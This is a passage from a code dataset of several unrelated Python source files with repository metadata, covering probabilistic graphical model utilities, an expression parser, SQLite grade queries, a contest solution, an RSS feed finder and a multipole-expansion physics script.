pgmpy.models import BayesianNetwork, MarkovNetwork\nfrom pgmpy.factors.discrete import TabularCPD, DiscreteFactor\nfrom pgmpy.factors import factor_product\nfrom pgmpy.inference import VariableElimination\n\n\ndef eliminate_variable(m, i):\n    \"\"\"\n    Eliminates one variable of an MRF in place.\n\n    :param m: a `pgmpy.models.MarkovNetwork`\n    :param i: name of the node to eliminate\n    \"\"\"\n\n    assert isinstance(m, MarkovNetwork)\n\n    factors = [f for f in m.get_factors() if i in f.variables]\n    f = pgmpy.factors.factor_product(*factors)\n    pos = f.variables.index(i)\n    f.values = np.sum(f.values, axis=pos)\n    f.cardinality = np.delete(f.cardinality, pos)\n    del f.variables[pos]\n    m.add_factors(f)\n    for u in range(len(f.variables)-1):\n        for v in range(u+1, len(f.variables)):\n            m.add_edge(f.variables[u], f.variables[v])\n    m.remove_factors(*factors)\n    m.remove_node(i)\n    # m.check_model()\n\n\ndef full(m):\n    \"\"\"\n    Compute the full factor product of all variables in the model\n\n    :param m: an MRF (pgmpy.models.MarkovNetwork)\n    :return: an np.ndarray with shapes according to the model's inputs\n    \"\"\"\n\n    m.check_model()\n\n    factor = m.factors[0]\n    factor = factor_product(\n        factor, *[m.factors[i] for i in range(1, len(m.factors))]\n    )\n    if set(factor.scope()) != set(m.nodes()):\n        raise ValueError(\"DiscreteFactor for all the random variables not defined.\")\n    return factor\n\n\ndef remove_non_ancestors(b, inputs):\n    \"\"\"\n    Given a Bayesian network, create a copy that includes the inputs and their ancestors, but removes non-ancestor nodes.\n\n    :param b: a `pgmpy.models.BayesianNetwork`\n    :param inputs: list of nodes\n    :return: a `pgmpy.models.BayesianNetwork`\n    \"\"\"\n\n    assert isinstance(b, BayesianNetwork)\n\n    visited = set()\n    to_visit = set(inputs)\n    edges = []\n    cpds = []\n    while len(to_visit) > 0:\n        new = to_visit.pop()\n        visited.add(new)\n        cpd = b.get_cpds(new)\n        cpds.append(copy.deepcopy(cpd))\n        for parent in cpd.variables[1:]:\n            if parent not in visited and parent not in to_visit:\n                to_visit.add(parent)\n            edges.append([parent, new])\n    b = BayesianNetwork(edges)\n    for n in visited:\n        b.add_node(n)\n    b.add_cpds(*cpds)\n    return b\n\n\ndef multiply_mms(u, v, inputs):\n    \"\"\"\n    Multiply two MRFs u and v so that, if Z(m) marginalizes an MRF m over `inputs`,\n    Z(product) = Z(u)*Z(v).\n\n    :param u: a `pgmpy.models.MarkovNetwork`\n    :param v: a `pgmpy.models.MarkovNetwork`\n    :return: a `pgmpy.models.MarkovNetwork`\n    \"\"\"\n\n    assert all([i in u.nodes for i in inputs])\n    assert all([i in v.nodes for i in inputs])\n\n    def add_data(m, suffix):\n\n        for n in list(m.nodes):\n            if n not in inputs:\n                nodes.add(n+suffix)\n\n        for e in list(m.edges):\n            if e[0] in inputs and e[1] in inputs:\n                edges.add((e[0], e[1]))\n            else:\n                newedge = []\n                for n in e:\n                    if n in inputs:\n                        newedge.append(n)\n                    else:\n                        newedge.append(n+suffix)\n                edges.add((newedge[0], 
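# Hedged usage sketch of the Bert_BiGru_Crf record above (the checkpoint name and
# batch construction are assumptions, not from that repository):
#     model = Bert_BiGru_Crf.from_pretrained("bert-base-chinese", label_num=13)
#     loss = model(text_batch, label_batch)   # negative CRF log-likelihood to minimize
#     tags = model.predict(text_batch)        # one list of label ids per sequence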
newedge[1]))\n\n for f in list(m.get_factors()):\n newvariables = []\n for n in f.variables:\n if n in inputs:\n newvariables.append(n)\n else:\n newvariables.append(n+suffix)\n newf = DiscreteFactor(newvariables, f.cardinality, f.values)\n factors.append(newf)\n\n nodes = set([i for i in inputs])\n edges = set()\n factors = []\n add_data(u, '_1')\n add_data(v, '_2')\n\n result = MarkovNetwork(edges)\n result.add_factors(*factors)\n result.check_model()\n return result\n\n\ndef divide_mms(u, v):\n \"\"\"\n Divide a graphical model (Bayesian or Markov) by a MarkovNetwork (u / v)\n\n :param u: a `pgmpy.models.BayesianNetwork` or `pgmpy.models.MarkovNetwork`, the numerator\n :param v: a `pgmpy.models.MarkovNetwork`, the denominator\n :return: a `pgmpy.models.MarkovNetwork`\n \"\"\"\n\n assert isinstance(v, MarkovNetwork)\n if isinstance(u, BayesianNetwork):\n u = u.to_markov_model()\n else:\n u = copy.deepcopy(u)\n for n in v.nodes:\n u.add_node(n)\n for edge in v.edges:\n u.add_edge(edge[0], edge[1])\n u_factors = {frozenset(f.variables): f for f in u.factors}\n for f in v.factors:\n if frozenset(f.variables) in u_factors:\n zeros = np.where(u_factors[frozenset(f.variables)].values == 0)\n u_factors[frozenset(f.variables)].values /= f.values\n u_factors[frozenset(f.variables)].values[zeros] = 0\n else:\n fnew = copy.deepcopy(f)\n fnew.values = 1/fnew.values\n if isinstance(fnew.values, np.float64):\n if fnew.values == float('Inf'):\n fnew.values = 1e3\n else:\n fnew.values[fnew.values == float('Inf')] = 1e3\n u.add_factors(fnew)\n u.check_model()\n return u\n\n\ndef eliminate(m, to_keep=None, to_remove=None, output='network', heuristic='MinWeight'):\n \"\"\"\n Given an MRF, eliminate a set of nodes. This does not modify the original MRF\n\n :param m: a `pgmpy.models.MarkovNetwork`\n :param to_keep: a list of nodes to remove. Pass either this or `to_remove`\n :param to_remove: a list of nodes to remove. Pass either this or `to_keep`\n :param output: 'network' (default) or 'factor'\n :param heuristic: variable ordering heuristic. 
Currently supported are 'MinWeight' (default) and 'MinNeighbors'\n :return: a `pgmpy.models.MarkovNetwork` if `output` is 'network', `pgmpy.factors.discrete.DiscreteFactor` if it is 'factor'\n\n TODO: MinFill, MinWeight,\n \"\"\"\n\n if to_remove is None:\n to_remove = set(m.nodes).difference(set(to_keep))\n\n def cost(m, n, heuristic):\n if heuristic == 'MinNeighbors':\n return len(list(m.neighbors(n)))\n elif heuristic == 'MinWeight':\n return np.prod([m.get_cardinality(neighbor) for neighbor in m.neighbors(n)])\n else:\n raise ValueError\n\n if isinstance(m, BayesianNetwork):\n m = m.to_markov_model()\n else:\n m = m.copy()\n\n while len(to_remove) > 0:\n scores = {n: cost(m, n, heuristic) for n in to_remove}\n min_score_node = min(scores, key=scores.get)\n to_remove.remove(min_score_node)\n eliminate_variable(m, min_score_node)\n if output == 'network':\n return m\n else:\n f = full(m)\n f.values = f.values.transpose(*[f.variables.index(v) for v in to_keep])\n f.variables = to_keep\n return f\n\n\ndef add_function_node(b, outputs, function, label='function'):\n \"\"\"\n Modifies a Bayesian network in place by adding a new node that is a function of a few input nodes.\n\n This is useful to study functions of interest that are defined in terms of a number of nodes in the network.\n\n :param b: a `BayesianNetwork`\n :param outputs: a list of nodes that `function` will depend on\n :param function: a function that takes `outputs` as arguments and returns a scalar\n \"\"\"\n\n import inspect\n names = [b.get_cpds(output).state_names[output] for output in outputs]\n\n shape = [b.get_cardinality(output) for output in outputs]\n values = np.zeros(shape)\n idx = np.array(np.unravel_index(np.arange(np.prod(shape)), shape)).T\n for i in range(idx.shape[0]):\n values[tuple(idx[i, :])] = function(*[names[j][idx[i, j]] for j in range(idx.shape[1])])\n values = values.reshape(1, -1)\n cpd = pgmpy.factors.discrete.CPD.TabularCPD(label, 1, evidence=outputs, evidence_card=shape, values=values)\n b.add_node(node=label)\n for output in outputs:\n b.add_edge(output, label)\n b.add_cpds(cpd)\n\n\ndef to_mrf(b, output, values):\n \"\"\"\n Generate an MRF that encodes the expected value of an output node in a given BN. 
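(For reference on the eliminate heuristics above: MinNeighbors scores a node by its neighbour count, while MinWeight scores it by the product of its neighbours' cardinalities -- the size of the factor that summing that node out would create.) 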
This\n is done by adding a new potential phi whose value for each O=o is o.\n\n :param b: A Bayesian network (pgmpy.models.BayesianNetwork)\n :param output: the target node\n :param values: a vector containing the values of variable `output`\n :return: an MRF (pgmpy.models.MarkovNetwork)\n \"\"\"\n\n assert output in b.nodes()\n assert 'output' not in b.nodes()\n\n m = b.to_markov_model()\n m.add_node('output')\n m.add_edge(output, 'output')\n m.add_factors(DiscreteFactor([output, 'output'], [m.get_cardinality(output), 1], np.array(values)[:, None]))\n m.check_model()\n return m\n","repo_name":"rballester/bnsobol","sub_path":"bnsobol/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8668,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"7311392959","text":"from .tokens import TokenType\nfrom .nodes import *\n\n# The idea of a parser is to parse a given set of tokens into a corresponding tree structure\n# in order to make it easier for the interpreter (next stage).\n# So for example the expression '2+3' should be parsed into:\n# (AddNode)\n# / \\\n# (NumberNode) (NumberNode)\n\n\nclass Parser:\n def __init__(self, tokens):\n self.tokens = iter(tokens)\n self.current_token = None\n self.advance()\n\n def raise_syntax_error(self):\n raise Exception(\"Invalid Syntax\")\n\n def advance(self):\n try:\n self.current_token = next(self.tokens)\n except StopIteration:\n self.current_token = None\n\n # Parsing a whole given set of tokens\n def parse(self):\n if self.current_token is None:\n return None\n\n result = self.expr()\n\n # current_token should be None after evaluating all tokens\n if self.current_token is not None:\n self.raise_syntax_error()\n\n return result\n\n # Search for the next expression e.g: '2+3' is a valid expression\n def expr(self):\n result = self.term()\n\n while self.current_token is not None and self.current_token.type in (TokenType.PLUS, TokenType.MINUS):\n if self.current_token.type == TokenType.PLUS:\n self.advance()\n result = AddNode(result, self.term())\n elif self.current_token.type == TokenType.MINUS:\n self.advance()\n result = SubtractNode(result, self.term())\n return result\n\n # Search for the next term e.g: '2*3' is a valid term\n def term(self):\n result = self.exp()\n\n while self.current_token is not None and \\\n self.current_token.type in (TokenType.MULTIPLY, TokenType.DIVIDE):\n if self.current_token.type == TokenType.MULTIPLY:\n self.advance()\n result = MultiplyNode(result, self.exp())\n elif self.current_token.type == TokenType.DIVIDE:\n self.advance()\n result = DivideNode(result, self.exp())\n return result\n\n # Exponent expression like x^3 has higher precedence than multiplication and division\n def exp(self):\n result = self.factor()\n\n while self.current_token is not None and self.current_token.type == TokenType.POWER:\n self.advance()\n result = PowerNode(result, self.factor())\n return result\n\n # Search for the next factor or unary operator\n def factor(self):\n token = self.current_token\n\n # Adding the precedence of the () parenthesis\n if token.type == TokenType.LEFT_PAREN:\n self.advance()\n result = self.expr()\n if self.current_token.type != TokenType.RIGHT_PAREN:\n self.raise_syntax_error()\n self.advance()\n return result\n\n if token.type == TokenType.NUMBER:\n self.advance()\n return NumberNode(token.value)\n elif token.type == TokenType.X:\n self.advance()\n return XNode()\n elif token.type == TokenType.PLUS:\n self.advance()\n return 
PlusNode(self.factor())\n elif token.type == TokenType.MINUS:\n self.advance()\n return MinusNode(self.factor())\n\n self.raise_syntax_error()\n","repo_name":"amirhesham65/function-plotter","sub_path":"interpreter/parser_.py","file_name":"parser_.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70031777917","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 20 17:02:20 2019\n\n@author: mohit\n\"\"\"\n\nimport helper\nimport numpy as np\nimport Example\nfrom openpyxl import load_workbook\nimport itertools as it\n\n\ndef getConstraintsForAll(dataTensor, variables, orderingNotImp):\n repeatDim = ()\n r = set([v for v in range(len(variables)) if v not in repeatDim])\n constraints = {}\n for l, (m, s) in enumerate(helper.split(r, (), repeatDim)):\n newset = m + s\n\n # this value will be used to filter max constraints\n maxPossible = 1\n for i in range(len(s)):\n maxPossible *= len(variables[s[i]])\n idTensor = helper.tensorIndicator(dataTensor, newset, variables)\n\n sumSet = range(len(m), len(newset))\n\n sumTensor_max, sumTensor_min = helper.tensorSum(\n idTensor, sumSet, np.array(variables)[list(newset)], 0\n )\n\n if len(set(s)) == 1 and len(set(orderingNotImp) & set(s)) == 0:\n (\n minConsZero,\n maxConsZero,\n minConsNonZero,\n maxConsNonZero,\n ) = helper.tensorConsZero(\n idTensor, sumSet, np.array(variables)[list(newset)]\n )\n else:\n minConsZero, maxConsZero, minConsNonZero, maxConsNonZero = (0, 0, 0, 0)\n row = {}\n row[\"minSum\"] = int(sumTensor_min) if sumTensor_min < maxPossible else 0\n row[\"maxSum\"] = int(sumTensor_max) if sumTensor_max < maxPossible else 0\n row[\"minConsZero\"] = int(minConsZero) if minConsZero < maxPossible else 0\n row[\"maxConsZero\"] = int(maxConsZero) if maxConsZero < maxPossible else 0\n row[\"minConsNonZero\"] = (\n int(minConsNonZero) if minConsNonZero < maxPossible else 0\n )\n row[\"maxConsNonZero\"] = (\n int(maxConsNonZero) if maxConsNonZero < maxPossible else 0\n )\n\n key = \",\".join([str(i) for i in m])\n key += \":\"\n key += \",\".join([str(i) for i in s])\n constraints[key] = row\n\n return constraints\n\n\ndef get_data(filename, sheet, data_range, variables):\n output = np.zeros([len(variables[0]), len(variables[1]), len(variables[2])])\n x_mapping = np.zeros(\n [len(variables[0]), len(variables[1]), len(variables[2])]\n ).astype(int)\n y_mapping = np.zeros(\n [len(variables[0]), len(variables[1]), len(variables[2])]\n ).astype(int)\n wb = load_workbook(filename=filename, read_only=True)\n ws = wb[sheet]\n data = []\n indices = []\n tmp = data_range.coord.split(\":\")\n for i, row in enumerate(ws[tmp[0] : tmp[1]]):\n for j, cell in enumerate(row):\n data.append(cell.value)\n indices.append([cell.row - 1, cell.column - 1])\n\n for i, element in enumerate(it.product(*variables)):\n index = ()\n for j, el in enumerate(element):\n index = index + (variables[j].index(el),)\n output[index] = data[i]\n x_mapping[index] = indices[i][0]\n y_mapping[index] = indices[i][1]\n # print(x_mapping,y_mapping)\n return output, x_mapping, y_mapping\n\n\ndef learnConstraints(filename, sheet, data_ranges):\n constraints = []\n variables = []\n for data_range in data_ranges:\n ex = Example.Example(filename, sheet, data_range)\n dataTensor, variables = ex.get_dimensions_and_data()\n dataTensor = dataTensor.transpose((1, 2, 0))\n variables = [variables[1], variables[2], variables[0]]\n\n lenVar = []\n for i in 
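# Illustrative parse using the Parser record above (token construction is assumed
# to live in this package's lexer): for "2 + 3 * x ^ 2" the resulting tree is
#     AddNode(NumberNode(2.0),
#             MultiplyNode(NumberNode(3.0),
#                          PowerNode(XNode(), NumberNode(2.0))))
# because expr() handles +/- last, term() binds * and / tighter, and exp()
# binds ^ tighter still.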
range(len(variables)):\n lenVar.append(len(variables[i]))\n orderingNotImp = [0]\n constraints.append(getConstraintsForAll(dataTensor, variables, orderingNotImp))\n # print(constraints)\n return constraints, [variables[2], variables[0], variables[1]]\n\n\n# return np.matrix([list(val.values()) for val in constraints.values()]),variables\n\n# if __name__ == \"__main__\":\n# constraints,var = learnConstraints(\"data.xlsx\",\"sheet1\",[\"B1:V1\",\"B2:V2\"],[\"A3:A14\"],\"B3:V14\")\n# partial_sol,index_mapping=get_data(\"sol.xlsx\",\"sheet1\", \"B3:V14\",var)\n## print(partial_sol)\n# generatesSample(len(var[1]),len(var[2]),len(var[0]),1,constraints,partial_sol,\"\")\n","repo_name":"116014/countOR","sub_path":"learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2367511991","text":"import sqlite3\nfrom tokenize import Name\n\n# connect to databse\nconn = sqlite3.connect('grades.db')\n\n# create a cursor\nc = conn.cursor()\n\n# query values from database\nc.execute(\"\"\"SELECT * FROM waec_scores\"\"\")\n\nrows = c.fetchall()\n\n# print(type(rows))\n\n# program to determine student with highest score in maths\ndef max_math():\n c.execute(\"\"\"SELECT Name, MAX(Maths) FROM waec_scores\"\"\")\n \n rows = c.fetchall()\n for rows in rows:\n Name, Maths = rows\n print(f\" The student with the highest score in Maths is {Name} with {Maths} score. \\n\"f\"{'.'*70}\")\n # print()\nmax_math()\n\n# program to determine the student with the lowest score in English\ndef min_english():\n c.execute(\"\"\"SELECT Name, MIN(English) FROM waec_scores\"\"\")\n \n rows = c.fetchall()\n for rows in rows:\n Name, English = rows\n print(f\" The student with the least score in English is {Name} with {English} score. 
\\n\"f\"{'.'*70}\")\n\nmin_english()\n\n# program to determine the average score in English\ndef avg_english():\n    c.execute(\"\"\"SELECT Name, AVG(English) FROM waec_scores\"\"\")\n    \n    rows = c.fetchall()\n    for rows in rows:\n        Name, English = rows\n        print(f\" The student with the average score in English is {Name} with {English} score \\n\"f\"{'.'*70}\")\n\navg_english()\n    \n# program to determine the average score in Maths\ndef avg_maths():\n    c.execute(\"\"\"SELECT Name, AVG(Maths) FROM waec_scores\"\"\")\n    \n    rows = c.fetchall()\n    for rows in rows:\n        Name, Maths = rows\n        print(f\" The student with the average score in Maths is {Name} with {Maths} score \\n\"f\"{'.'*70}\")\n\navg_maths()\n\n# program to determine the best performing student across all subjects\ndef best_student():\n    c.execute(\"\"\"SELECT Name,\n    SUM(Maths+English+Basic_science+Agri_science+Language+Economics+Physics+Chemistry+Literature) AS Total_score\n    FROM waec_scores\n    GROUP BY Name\n    ORDER BY total_score DESC\n    LIMIT 1\n    \"\"\")\n    \n    rows = c.fetchall()\n    for rows in rows:\n        Name, Total_score = rows\n        print(f\" The overall best student is {Name} with {Total_score} score \\n\"f\"{'.'*70}\")\n\nbest_student()\n\n# program to determine the overall average student\ndef avg_best_student():\n    c.execute(\"\"\"SELECT Name,\n    AVG(Maths+English+Basic_science+Agri_science+Language+Economics+Physics+Chemistry+Literature) AS Avg_score\n    FROM waec_scores\n    GROUP BY Name\n    ORDER BY Avg_score DESC\n    LIMIT 1 \n    \"\"\")\n\n    rows = c.fetchall()\n    for rows in rows:\n        Name, Avg_score = rows\n        print(f\" The overall average best student is {Name} with {Avg_score} score \\n\"f\"{'.'*70}\")\n\navg_best_student()","repo_name":"Teriekarie/DSCI_SGA","sub_path":"ASSIGNMENT/Module5/query_waec.py","file_name":"query_waec.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33187382641","text":"# https://www.luogu.com.cn/problem/T125728?contestId=27163\n# https://www.luogu.com.cn/blog/12cow/SBCOI2020\n\n# import sys, heapq\n# from collections import *\n# from functools import lru_cache\n# sys.setrecursionlimit(10**6)\n\n\n# @lru_cache(None)\n# def em(mm, aa, bb):\n#     if mm == aa+bb: res = 0\n#     elif aa+bb == 0: return 1\n#     else: res = (em(mm-1,aa,bb)+od(mm-1,aa,bb)+ev(mm-1,aa,bb))%Mod\n#     # print(0, mm,aa,bb,res)\n#     return res\n\n# @lru_cache(None)\n# def od(mm, aa, bb):\n#     if aa == 0: res = 0\n#     elif mm == aa+bb: res = 1 if bb == 0 else 0\n#     else: res = (em(mm-1,aa-1,bb)+od(mm-1,aa-1,bb))%Mod\n#     # print(1, mm, aa, bb, res)\n#     return res\n\n# @lru_cache(None)\n# def ev(mm, aa, bb):\n#     if bb == 0: res = 0\n#     elif mm == aa+bb: res = 1\n#     else: res = (em(mm-1,aa,bb-1)+od(mm-1,aa,bb-1)+ev(mm-1,aa,bb-1))%Mod\n#     # print(2, mm, aa, bb, res)\n#     return res\n\n\n\n# # sys.stdin = open('input.txt', 'r')\n# t = input()\n# t = int(t)\n# Mod = 998244353\n# for _ in range(t):\n#     m, a, b = map(int, input().split(' '))\n#     print((em(m,a,b)+od(m,a,b)+ev(m,a,b))%Mod)\n\n\nimport sys, heapq\nfrom collections import *\nfrom functools import lru_cache\nsys.setrecursionlimit(10**8)\n\n\n\ndef main():\n    @lru_cache(None)\n    def dfs(mm, aa, bb):\n        # print(mm,aa,bb)\n        if mm == aa + bb:\n            res = 1\n        elif aa + bb == 0:\n            res = 1\n        elif aa == 0:\n            res = (dfs(mm - 1, 0, bb) + dfs(mm - 1, 0, bb - 1)) % Mod\n        elif bb == 0:\n            res = (dfs(mm - 1, aa, 0) + dfs(mm - 1, aa - 1, 0)) % Mod\n        else:\n            res = (dfs(mm - 1, aa, bb) + dfs(mm - 1, aa, bb - 1) + dfs(mm - 1, aa - 1, bb) - dfs(mm - 
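# The query_waec queries above all share one shape -- aggregate per student,
# GROUP BY, ORDER BY, then LIMIT 1; e.g. a hypothetical "weakest overall student"
# variant (not in the original assignment):
#     SELECT Name, SUM(Maths + English + Basic_science + Agri_science + Language
#                      + Economics + Physics + Chemistry + Literature) AS Total_score
#     FROM waec_scores GROUP BY Name ORDER BY Total_score ASC LIMIT 1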
2, aa - 1,\n                                                                                              bb - 1)) % Mod\n        # print('**', mm,aa,bb,res)\n        return res\n\n    sys.stdin = open('input.txt', 'r')\n    t = int(input())\n    Mod = 998244353\n    dfs(100,100,100)\n    for _ in range(t):\n        m, a, b = map(int, input().split(' '))\n        print(dfs(m, a, b))\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n","repo_name":"zhenfelix/OnlineJudgeCodings","sub_path":"luogu/T125728 [SBCOI2020]人.py","file_name":"T125728 [SBCOI2020]人.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20550139187","text":"'''\nCreated on Apr 10, 2010\n\n@author: hammer\n'''\nimport re\nimport urllib2\nfrom urlparse import urljoin\nfrom BeautifulSoup import BeautifulSoup\n\nclass RSSFeedExtractor(object):\n    __link = None\n    \n    def getFeedURL(self):\n        return self.__link\n\n    def __init__(self, url):\n        html = urllib2.urlopen(url.strip())\n        soup = BeautifulSoup(html)\n        \n        res = soup.findAll('link', rel='alternate', attrs={'type': re.compile(\"^application/(atom|rss)\\\\+xml\")})\n        if len(res) == 0:\n            #print \"Couldn't find the Feed!\"\n            return\n        \n        href = res[0]['href']\n        \n        # relative link?\n        if not href.startswith(\"http\"):\n            self.__link = urljoin(url, href)\n        else:\n            self.__link = href","repo_name":"claudiomartella/WheresTheJuice","sub_path":"bins/RSSFeedExtractor.py","file_name":"RSSFeedExtractor.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"70023095676","text":"# import modules\nimport numpy as np\n\nimport scipy as sc\nfrom scipy import misc\nfrom scipy import special\n\nimport matplotlib\nimport matplotlib.cm as cm\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n\n# Note: this transforms A to B\ndef 
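# Hypothetical use of the RSSFeedExtractor record above (the URL is a
# placeholder): RSSFeedExtractor("http://example.com/blog").getFeedURL()
# returns the discovered atom/rss <link> href, or None when the page declares
# no alternate feed link.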
\\\n \"N_charges = \" + repr(self.num_q) + \"\\n\" + \\\n \"Charge values = \" + repr(self.q) + \"\\n\" + \\\n \"Charge coords = \" + \"\\n\" + repr(self.q_coords) + \"\\n\"\n \n def mul_exp(self,p):\n \"\"\"\n This function computes the multipole expansions for the componentwise force computation\n inputs:\n m - degree of the expansion\n n - order of the expansion\n \"\"\"\n self.p = p\n self.M = np.array([[np.sum([q * qc['rho'] **(n) * my_sph(-m, n, qc['alpha'], qc['beta']) \n for q,qc in zip(self.q,self.q_coords)]) \n for m in range(-n,n+1)] for n in range(self.p+1)])\n \n def rotate(self, theta, alpha, beta, gamma):\n \"\"\"\n Performs the rigid body rotation of the inertial properties and the rotation of \n the multipole expansions\n inputs: \n theta - angle for the kinematic rotations \n ** not implemented yet (not needed at this time)\n \"\"\"\n # initialze arrays with zeros\n C = np.zeros(3)\n d = [[[0.0+1j*0 for m in range(-n,n+1)] for mp in range(-n,n+1)] for n in range(self.p+1)]\n Mp = [[0.0+1j*0 for m in range(-n,n+1)] for n in range(self.p+1)]\n \n # also set to zeros\n D = d\n \n # d[0][0][0] and D[0][0][0] are known \n d[0][0][0] = 1\n D[0][0][0] = 1\n\n Mp[0][0] = self.M[0][0]\n\n # recursive computation of terms of d and D matricies\n for n in range(1,self.p+1):\n for mp in range(-n,n+1):\n for m in range(-n,n+1):\n if mp < -(n-1):\n C[0] = np.sin(beta/2)**2*np.sqrt((n+m)*(n+m-1)/((n-mp)*(n-mp-1)))\n C[1] = 2*np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n+m)*(n-m)/((n-mp)*(n-mp-1)))\n C[2] = np.cos(beta/2)**2*np.sqrt((n-m)*(n-m-1)/((n-mp)*(n-mp-1)))\n d[n][mp+n][m+n] = np.sum([C[i-m+1]*d[n-1][mp+1+(n-1)][i+(n-1)] \n for i in range(np.max([m-1,-(n-1)]), np.min([m+1,n-1])+1)])\n elif mp > (n-1):\n C[0] = np.cos(beta/2)**2*np.sqrt((n+m)*(n+m-1)/((n+mp)*(n+mp-1)))\n C[1] = -2*np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n+m)*(n-m)/((n+mp)*(n+mp-1)))\n C[2] = np.sin(beta/2)**2*np.sqrt((n-m)*(n-m-1)/((n+mp)*(n+mp-1)))\n d[n][mp+n][m+n] = np.sum([C[i-m+1]*d[n-1][mp-1+(n-1)][i+(n-1)] \n for i in range(np.max([m-1,-(n-1)]), np.min([m+1,n-1])+1)])\n else:\n C[0] = np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n+m)*(n+m-1)/((n+mp)*(n-mp)))\n C[1] = (np.cos(beta/2)**2-np.sin(beta/2))*np.sqrt((n-m)*(n+m)/((n-mp)))\n C[2] = -np.sin(beta/2)*np.cos(beta/2) \\\n *np.sqrt((n-m)*(n-m+1)/((n-mp)*(n+mp)))\n d[n][mp+n][m+n] = np.sum([C[i-m+1]*d[n-1][mp+(n-1)][i+(n-1)] \n for i in range(np.max([m-1,-(n-1)]), np.min([m+1,n-1])+1)])\n D[n][mp+n][m+n] = np.exp(1j*m*gamma)*d[n][mp+n][m+n]*np.exp(1j*m*alpha)\n Mp[n][mp+n] = np.dot(D[n][mp+n],self.M[n])\n self.M = Mp\n \n def potential(self, rp):\n \"\"\"\n This function computes the couloumb potential due to a charged body at a \n particluar point in space.\n inputs:\n loc - spherical coordinates of the point of interest\n outputs:\n Phi - potential\n \"\"\"\n rp = rp[0]\n Phi = np.sum([np.sum([self.M[n][m+n]/rp['rho']**(n+1)\n *my_sph(m, n, rp['alpha'], rp['beta']) \n for m in range(-n,n+1)]) for n in range(self.p+1)])\n# [[print('M[',n,'][',m+n,']= ',\"{0:.3f}\".format(self.M[n][m+n]),\n# 'rp^n = ',\"{0:.3f}\".format(rp['rho']**(n+1)),\n# 'Y(theta,phi) = ',\"{0:.3f}\".format(my_sph(m, n, rp['alpha'], rp['beta']))) \n# for m in range(-n,n+1)] for n in range(self.p+1)]\n# [print('Phi[',n,'] = ', \"{0:.3f}\".format(np.sum([self.M[n][m+n]/rp['rho']**(n+1)*my_sph(m, n, rp['alpha'], rp['beta']) \n# for m in range(-n,n+1)]))) for n in range(self.p+1)]\n return Phi\n\n# <codecell>\n\ndef example(zeta,d,p):\n # Describe system \n # Characteristic length \n 
a = 1\n\n # charge values for the dipole\n q = [-1, 1]\n\n # location of charges w.r.t origin\n roq = np.array([[-a/2, 0, 0],\n [ a/2, 0, 0]])\n \n # Define test point\n rcq_p = np.array([0, -d, 0])\n\n\n # Compute the center of charge and locate particles w.r.t. center of charge\n rocq = np.sum([abs(q)*r for q,r in zip(q,roq)],0)/np.sum(np.abs(q))\n rcq_q = np.array([rq - rocq for rq in roq])\n # print(rocq)\n # print()\n # print(rcq_q)\n\n # array of rotation increments\n angle = np.array([0, zeta])\n\n # dipole orientation 'A'\n rcq_qa = rcq_q\n\n # Create system 'B' by rotating system 'A'\n CAB = DCM(angle[1])\n rcq_qbT = np.dot(CAB,rcq_qa.T)\n rcq_qb = rcq_qbT.T\n\n # Transform coordinates of point of interest\n rcq_p_sph = cart_to_sph(np.array([rcq_p]))\n\n # Transform coordinates of charge locations\n rcq_qa_sph = cart_to_sph(rcq_qa)\n rcq_qb_sph = cart_to_sph(rcq_qb)\n\n # Create charged bodies for systems A and B\n bodyA = ChargedBody(q, rcq_qa_sph, 1)\n bodyB = ChargedBody(q, rcq_qb_sph, 2)\n\n # Form Multipole Expansions\n bodyA.mul_exp(p)\n bodyB.mul_exp(p)\n\n # Evaluate Potential at a point [r theta phi]\n# PhiA = bodyA.potential(rcq_p_sph)\n PhiB = bodyB.potential(rcq_p_sph)\n PhiB = PhiB.real\n# print(\"Potential (via M.E.) of System B at point 'p' = \",PhiB.real)\n\n # Compute the exact solution \n VB = np.sum([qb/np.linalg.norm(-rcq_p + r) for qb,r in zip(q,rcq_qb)])\n# print(\"Potential (exact) of System A at point 'p' = \",VA)\n# print(\"Potential (exact) of System B at point 'p' = \",VB)\n\n # Perform a rotation on System A so that it is the same configuration as B \n alpha = -zeta\n beta = 0\n gamma = 0\n bodyA.rotate(0, alpha, beta, gamma)\n\n # Evaluate potential of 'A' at 'B'\n PhiA_B = bodyA.potential(rcq_p_sph)\n PhiA_B = PhiA_B.real\n \n # Compute the error bound\n rr = np.linalg.norm(rcq_p)\n # [print('rho = ',r['rho']) for r in rcq_qb_sph]\n aa = np.max([rq['rho'] for rq in rcq_qb_sph])\n # print('a = ',a)\n Q = np.sum(np.abs(q))\n # print('Q = ',Q)\n # print('r - a = ',r - a)\n # print('a/r = ',a/r)\n # bound = Q/(rr-aa)*(aa/rr)**(p+1)/np.abs(VB)*100\n bound = Q/(rr-aa)*(aa/rr)**(p+1)\n return VB, PhiB, PhiA_B, bound\n\n# <markdowncell>\n\n# ### Try theta = 5 to 355 degrees and R/L = 1 to 10\n\n# <codecell>\n\np = 3\n# Terms in multipole expansion \n\n# Number of data points in range\nn_points = 20\n\n# Create variable arrays\ntheta = np.linspace(0,2*np.pi,n_points)\ndist = np.linspace(.6,2.5,n_points)\n\n# Evaluate Error in List Comprehension\nresults = np.array([[example(zeta,d,p) \\\n for d in dist] for zeta in theta])\n# for zeta in theta] for d in dist]);\n\nVB = results[:,:,0].real\nPhiB = results[:,:,1].real\nPhiA_B = 